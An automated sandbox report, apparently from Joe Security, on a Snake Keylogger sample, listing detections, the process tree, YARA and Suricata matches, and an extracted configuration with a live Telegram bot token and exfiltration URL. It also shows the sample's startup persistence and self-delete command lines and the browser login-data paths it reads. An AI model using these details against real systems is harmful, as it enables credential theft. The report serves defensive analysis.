Edit tour

Windows Analysis Report
MBOaS3GRtF.exe

Overview

General Information

Sample name:	MBOaS3GRtF.exe renamed because original name is a hash value
Original sample name:	d9f1e70cd9264c96526b79da353f0d2650c4019bc7e38bc42fc8d2ff88ffb807.exe
Analysis ID:	1588656
MD5:	c24d00f74e24d7717a75692e6542e8d4
SHA1:	7856f14360a45eee5d08e53b7aaacffc7b85fcda
SHA256:	d9f1e70cd9264c96526b79da353f0d2650c4019bc7e38bc42fc8d2ff88ffb807
Tags:	exeSnakeKeyloggeruser-adrian__luca
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Yara detected Snake Keylogger

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Drops VBS files to the startup folder

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Sigma detected: WScript or CScript Dropper

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Yara detected Generic Downloader

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

MBOaS3GRtF.exe (PID: 7628 cmdline: "C:\Users\user\Desktop\MBOaS3GRtF.exe" MD5: C24D00F74E24D7717A75692E6542E8D4)

supergroup.exe (PID: 7744 cmdline: "C:\Users\user\Desktop\MBOaS3GRtF.exe" MD5: C24D00F74E24D7717A75692E6542E8D4)

RegSvcs.exe (PID: 7764 cmdline: "C:\Users\user\Desktop\MBOaS3GRtF.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cmd.exe (PID: 2744 cmdline: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 7308 cmdline: choice /C Y /N /D Y /T 3 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

wscript.exe (PID: 8036 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\supergroup.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

supergroup.exe (PID: 8100 cmdline: "C:\Users\user\AppData\Local\Anglophile\supergroup.exe" MD5: C24D00F74E24D7717A75692E6542E8D4)

RegSvcs.exe (PID: 8144 cmdline: "C:\Users\user\AppData\Local\Anglophile\supergroup.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cmd.exe (PID: 4176 cmdline: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 700 cmdline: choice /C Y /N /D Y /T 3 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7767004773:AAG_mBqrFYZNr81F28ktwLAJ3brPq5BTRzg/sendMessage?chat_id=1217600190", "Token": "7767004773:AAG_mBqrFYZNr81F28ktwLAJ3brPq5BTRzg", "Chat_id": "1217600190", "Version": "5.1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.1396859862.00000000032A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.1396859862.00000000032A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000002.00000002.1396859862.00000000032A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000002.1396859862.00000000032A0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14c35:$a1: get_encryptedPassword 0x14f21:$a2: get_encryptedUsername 0x14a41:$a3: get_timePasswordChanged 0x14b3c:$a4: get_passwordField 0x14c4b:$a5: set_encryptedPassword 0x162f7:$a7: get_logins 0x1625a:$a10: KeyLoggerEventArgs 0x15ec5:$a11: KeyLoggerEventArgsEventHandler
00000002.00000002.1396859862.00000000032A0000.00000004.00001000.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c5b2:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b7e4:$a3: \Google\Chrome\User Data\Default\Login Data 0x1bc17:$a4: \Orbitum\User Data\Default\Login Data 0x1cc56:$a5: \Kometa\User Data\Default\Login Data
00000002.00000002.1396859862.00000000032A0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15832:$s1: UnHook 0x15839:$s2: SetHook 0x15841:$s3: CallNextHook 0x1584e:$s4: _hook
00000002.00000002.1396859862.00000000032A0000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19be0:$x1: $%SMTPDV$ 0x185c4:$x2: $#TheHashHere%& 0x19b88:$x3: %FTPDV$ 0x18564:$x4: $%TelegramDv$ 0x15ec5:$x5: KeyLoggerEventArgs 0x1625a:$x5: KeyLoggerEventArgs 0x19bac:$m2: Clipboard Logs ID 0x19dea:$m2: Screenshot Logs ID 0x19efa:$m2: keystroke Logs ID 0x1a1d4:$m3: SnakePW 0x19dc2:$m4: \SnakeKeylogger\
00000007.00000002.1730351913.0000000002E11000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000003.00000002.1571555540.0000000002661000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000003.00000002.1569174636.0000000000622000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.1569174636.0000000000622000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000003.00000002.1569174636.0000000000622000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a35:$a1: get_encryptedPassword 0x14d21:$a2: get_encryptedUsername 0x14841:$a3: get_timePasswordChanged 0x1493c:$a4: get_passwordField 0x14a4b:$a5: set_encryptedPassword 0x160f7:$a7: get_logins 0x1605a:$a10: KeyLoggerEventArgs 0x15cc5:$a11: KeyLoggerEventArgsEventHandler
00000003.00000002.1569174636.0000000000622000.00000040.80000000.00040000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x199e0:$x1: $%SMTPDV$ 0x183c4:$x2: $#TheHashHere%& 0x19988:$x3: %FTPDV$ 0x18364:$x4: $%TelegramDv$ 0x15cc5:$x5: KeyLoggerEventArgs 0x1605a:$x5: KeyLoggerEventArgs 0x199ac:$m2: Clipboard Logs ID 0x19bea:$m2: Screenshot Logs ID 0x19cfa:$m2: keystroke Logs ID 0x19fd4:$m3: SnakePW 0x19bc2:$m4: \SnakeKeylogger\
00000006.00000002.1565558570.0000000001890000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.1565558570.0000000001890000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000006.00000002.1565558570.0000000001890000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000006.00000002.1565558570.0000000001890000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14c35:$a1: get_encryptedPassword 0x14f21:$a2: get_encryptedUsername 0x14a41:$a3: get_timePasswordChanged 0x14b3c:$a4: get_passwordField 0x14c4b:$a5: set_encryptedPassword 0x162f7:$a7: get_logins 0x1625a:$a10: KeyLoggerEventArgs 0x15ec5:$a11: KeyLoggerEventArgsEventHandler
00000006.00000002.1565558570.0000000001890000.00000004.00001000.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c5b2:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b7e4:$a3: \Google\Chrome\User Data\Default\Login Data 0x1bc17:$a4: \Orbitum\User Data\Default\Login Data 0x1cc56:$a5: \Kometa\User Data\Default\Login Data
00000006.00000002.1565558570.0000000001890000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15832:$s1: UnHook 0x15839:$s2: SetHook 0x15841:$s3: CallNextHook 0x1584e:$s4: _hook
00000006.00000002.1565558570.0000000001890000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19be0:$x1: $%SMTPDV$ 0x185c4:$x2: $#TheHashHere%& 0x19b88:$x3: %FTPDV$ 0x18564:$x4: $%TelegramDv$ 0x15ec5:$x5: KeyLoggerEventArgs 0x1625a:$x5: KeyLoggerEventArgs 0x19bac:$m2: Clipboard Logs ID 0x19dea:$m2: Screenshot Logs ID 0x19efa:$m2: keystroke Logs ID 0x1a1d4:$m3: SnakePW 0x19dc2:$m4: \SnakeKeylogger\
Process Memory Space: supergroup.exe PID: 7744	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: supergroup.exe PID: 7744	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: supergroup.exe PID: 7744	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x9e7533:$a1: get_encryptedPassword 0x9e7815:$a2: get_encryptedUsername 0x9e7349:$a3: get_timePasswordChanged 0x9e7444:$a4: get_passwordField 0x9e7549:$a5: set_encryptedPassword 0x9e9a1f:$a7: get_logins 0x9e9982:$a10: KeyLoggerEventArgs 0x9e95ed:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: supergroup.exe PID: 7744	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x9e95ed:$x5: KeyLoggerEventArgs 0x9e9982:$x5: KeyLoggerEventArgs 0x9ea289:$x5: KeyLoggerEventArgs 0x9ea5ea:$x5: KeyLoggerEventArgs 0x9ebbad:$m2: Clipboard Logs ID 0x9ebcb3:$m2: Screenshot Logs ID 0x9ebd09:$m2: keystroke Logs ID 0x9ebe3e:$m3: SnakePW 0x9ebc9f:$m4: \SnakeKeylogger\
Process Memory Space: RegSvcs.exe PID: 7764	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7764	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: RegSvcs.exe PID: 7764	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2f6d5:$a1: get_encryptedPassword 0x2f9b7:$a2: get_encryptedUsername 0x2f4eb:$a3: get_timePasswordChanged 0x2f5e6:$a4: get_passwordField 0x2f6eb:$a5: set_encryptedPassword 0x31bc1:$a7: get_logins 0x31b24:$a10: KeyLoggerEventArgs 0x3178f:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 7764	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x3178f:$x5: KeyLoggerEventArgs 0x31b24:$x5: KeyLoggerEventArgs 0x3242b:$x5: KeyLoggerEventArgs 0x3278c:$x5: KeyLoggerEventArgs 0x33d4f:$m2: Clipboard Logs ID 0x33e55:$m2: Screenshot Logs ID 0x33eab:$m2: keystroke Logs ID 0x33fe0:$m3: SnakePW 0x33e41:$m4: \SnakeKeylogger\
Process Memory Space: supergroup.exe PID: 8100	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: supergroup.exe PID: 8100	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: supergroup.exe PID: 8100	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x17068d7:$a1: get_encryptedPassword 0x1706bb9:$a2: get_encryptedUsername 0x17066ed:$a3: get_timePasswordChanged 0x17067e8:$a4: get_passwordField 0x17068ed:$a5: set_encryptedPassword 0x1708dc3:$a7: get_logins 0x1708d26:$a10: KeyLoggerEventArgs 0x1708991:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: supergroup.exe PID: 8100	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1708991:$x5: KeyLoggerEventArgs 0x1708d26:$x5: KeyLoggerEventArgs 0x170962d:$x5: KeyLoggerEventArgs 0x170998e:$x5: KeyLoggerEventArgs 0x170af51:$m2: Clipboard Logs ID 0x170b057:$m2: Screenshot Logs ID 0x170b0ad:$m2: keystroke Logs ID 0x170b1e2:$m3: SnakePW 0x170b043:$m4: \SnakeKeylogger\
Process Memory Space: RegSvcs.exe PID: 8144	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.supergroup.exe.1890000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.supergroup.exe.1890000.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
6.2.supergroup.exe.1890000.1.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
6.2.supergroup.exe.1890000.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14c35:$a1: get_encryptedPassword 0x14f21:$a2: get_encryptedUsername 0x14a41:$a3: get_timePasswordChanged 0x14b3c:$a4: get_passwordField 0x14c4b:$a5: set_encryptedPassword 0x162f7:$a7: get_logins 0x1625a:$a10: KeyLoggerEventArgs 0x15ec5:$a11: KeyLoggerEventArgsEventHandler
6.2.supergroup.exe.1890000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c5b2:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b7e4:$a3: \Google\Chrome\User Data\Default\Login Data 0x1bc17:$a4: \Orbitum\User Data\Default\Login Data 0x1cc56:$a5: \Kometa\User Data\Default\Login Data
6.2.supergroup.exe.1890000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15832:$s1: UnHook 0x15839:$s2: SetHook 0x15841:$s3: CallNextHook 0x1584e:$s4: _hook
6.2.supergroup.exe.1890000.1.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19be0:$x1: $%SMTPDV$ 0x185c4:$x2: $#TheHashHere%& 0x19b88:$x3: %FTPDV$ 0x18564:$x4: $%TelegramDv$ 0x15ec5:$x5: KeyLoggerEventArgs 0x1625a:$x5: KeyLoggerEventArgs 0x19bac:$m2: Clipboard Logs ID 0x19dea:$m2: Screenshot Logs ID 0x19efa:$m2: keystroke Logs ID 0x1a1d4:$m3: SnakePW 0x19dc2:$m4: \SnakeKeylogger\
6.2.supergroup.exe.1890000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.supergroup.exe.1890000.1.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
6.2.supergroup.exe.1890000.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12e35:$a1: get_encryptedPassword 0x13121:$a2: get_encryptedUsername 0x12c41:$a3: get_timePasswordChanged 0x12d3c:$a4: get_passwordField 0x12e4b:$a5: set_encryptedPassword 0x144f7:$a7: get_logins 0x1445a:$a10: KeyLoggerEventArgs 0x140c5:$a11: KeyLoggerEventArgsEventHandler
6.2.supergroup.exe.1890000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a7b2:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x199e4:$a3: \Google\Chrome\User Data\Default\Login Data 0x19e17:$a4: \Orbitum\User Data\Default\Login Data 0x1ae56:$a5: \Kometa\User Data\Default\Login Data
6.2.supergroup.exe.1890000.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13a32:$s1: UnHook 0x13a39:$s2: SetHook 0x13a41:$s3: CallNextHook 0x13a4e:$s4: _hook
6.2.supergroup.exe.1890000.1.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17de0:$x1: $%SMTPDV$ 0x167c4:$x2: $#TheHashHere%& 0x17d88:$x3: %FTPDV$ 0x16764:$x4: $%TelegramDv$ 0x140c5:$x5: KeyLoggerEventArgs 0x1445a:$x5: KeyLoggerEventArgs 0x17dac:$m2: Clipboard Logs ID 0x17fea:$m2: Screenshot Logs ID 0x180fa:$m2: keystroke Logs ID 0x183d4:$m3: SnakePW 0x17fc2:$m4: \SnakeKeylogger\
2.2.supergroup.exe.32a0000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.supergroup.exe.32a0000.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.supergroup.exe.32a0000.1.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
2.2.supergroup.exe.32a0000.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14c35:$a1: get_encryptedPassword 0x14f21:$a2: get_encryptedUsername 0x14a41:$a3: get_timePasswordChanged 0x14b3c:$a4: get_passwordField 0x14c4b:$a5: set_encryptedPassword 0x162f7:$a7: get_logins 0x1625a:$a10: KeyLoggerEventArgs 0x15ec5:$a11: KeyLoggerEventArgsEventHandler
2.2.supergroup.exe.32a0000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c5b2:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b7e4:$a3: \Google\Chrome\User Data\Default\Login Data 0x1bc17:$a4: \Orbitum\User Data\Default\Login Data 0x1cc56:$a5: \Kometa\User Data\Default\Login Data
2.2.supergroup.exe.32a0000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15832:$s1: UnHook 0x15839:$s2: SetHook 0x15841:$s3: CallNextHook 0x1584e:$s4: _hook
2.2.supergroup.exe.32a0000.1.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19be0:$x1: $%SMTPDV$ 0x185c4:$x2: $#TheHashHere%& 0x19b88:$x3: %FTPDV$ 0x18564:$x4: $%TelegramDv$ 0x15ec5:$x5: KeyLoggerEventArgs 0x1625a:$x5: KeyLoggerEventArgs 0x19bac:$m2: Clipboard Logs ID 0x19dea:$m2: Screenshot Logs ID 0x19efa:$m2: keystroke Logs ID 0x1a1d4:$m3: SnakePW 0x19dc2:$m4: \SnakeKeylogger\
3.2.RegSvcs.exe.620000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.620000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.RegSvcs.exe.620000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
3.2.RegSvcs.exe.620000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14c35:$a1: get_encryptedPassword 0x14f21:$a2: get_encryptedUsername 0x14a41:$a3: get_timePasswordChanged 0x14b3c:$a4: get_passwordField 0x14c4b:$a5: set_encryptedPassword 0x162f7:$a7: get_logins 0x1625a:$a10: KeyLoggerEventArgs 0x15ec5:$a11: KeyLoggerEventArgsEventHandler
3.2.RegSvcs.exe.620000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c5b2:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b7e4:$a3: \Google\Chrome\User Data\Default\Login Data 0x1bc17:$a4: \Orbitum\User Data\Default\Login Data 0x1cc56:$a5: \Kometa\User Data\Default\Login Data
3.2.RegSvcs.exe.620000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15832:$s1: UnHook 0x15839:$s2: SetHook 0x15841:$s3: CallNextHook 0x1584e:$s4: _hook
3.2.RegSvcs.exe.620000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19be0:$x1: $%SMTPDV$ 0x185c4:$x2: $#TheHashHere%& 0x19b88:$x3: %FTPDV$ 0x18564:$x4: $%TelegramDv$ 0x15ec5:$x5: KeyLoggerEventArgs 0x1625a:$x5: KeyLoggerEventArgs 0x19bac:$m2: Clipboard Logs ID 0x19dea:$m2: Screenshot Logs ID 0x19efa:$m2: keystroke Logs ID 0x1a1d4:$m3: SnakePW 0x19dc2:$m4: \SnakeKeylogger\
2.2.supergroup.exe.32a0000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.supergroup.exe.32a0000.1.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
2.2.supergroup.exe.32a0000.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12e35:$a1: get_encryptedPassword 0x13121:$a2: get_encryptedUsername 0x12c41:$a3: get_timePasswordChanged 0x12d3c:$a4: get_passwordField 0x12e4b:$a5: set_encryptedPassword 0x144f7:$a7: get_logins 0x1445a:$a10: KeyLoggerEventArgs 0x140c5:$a11: KeyLoggerEventArgsEventHandler
2.2.supergroup.exe.32a0000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a7b2:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x199e4:$a3: \Google\Chrome\User Data\Default\Login Data 0x19e17:$a4: \Orbitum\User Data\Default\Login Data 0x1ae56:$a5: \Kometa\User Data\Default\Login Data
2.2.supergroup.exe.32a0000.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13a32:$s1: UnHook 0x13a39:$s2: SetHook 0x13a41:$s3: CallNextHook 0x13a4e:$s4: _hook
2.2.supergroup.exe.32a0000.1.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17de0:$x1: $%SMTPDV$ 0x167c4:$x2: $#TheHashHere%& 0x17d88:$x3: %FTPDV$ 0x16764:$x4: $%TelegramDv$ 0x140c5:$x5: KeyLoggerEventArgs 0x1445a:$x5: KeyLoggerEventArgs 0x17dac:$m2: Clipboard Logs ID 0x17fea:$m2: Screenshot Logs ID 0x180fa:$m2: keystroke Logs ID 0x183d4:$m3: SnakePW 0x17fc2:$m4: \SnakeKeylogger\
Click to see the 28 entries

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\supergroup.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\supergroup.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\supergroup.vbs" , ProcessId: 8036, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\supergroup.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\supergroup.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\supergroup.vbs" , ProcessId: 8036, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Anglophile\supergroup.exe, ProcessId: 7744, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\supergroup.vbs

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T03:45:18.926350+0100	2803305	3	Unknown Traffic	192.168.2.11	49770	104.21.64.1	443	TCP
2025-01-11T03:45:24.008171+0100	2803305	3	Unknown Traffic	192.168.2.11	49804	104.21.64.1	443	TCP
2025-01-11T03:45:27.781956+0100	2803305	3	Unknown Traffic	192.168.2.11	49837	104.21.64.1	443	TCP
2025-01-11T03:45:30.038027+0100	2803305	3	Unknown Traffic	192.168.2.11	49854	104.21.64.1	443	TCP
2025-01-11T03:45:34.512737+0100	2803305	3	Unknown Traffic	192.168.2.11	49880	104.21.64.1	443	TCP
2025-01-11T03:45:43.614361+0100	2803305	3	Unknown Traffic	192.168.2.11	49947	104.21.64.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T03:45:17.137970+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49744	132.226.8.169	80	TCP
2025-01-11T03:45:18.356728+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49744	132.226.8.169	80	TCP
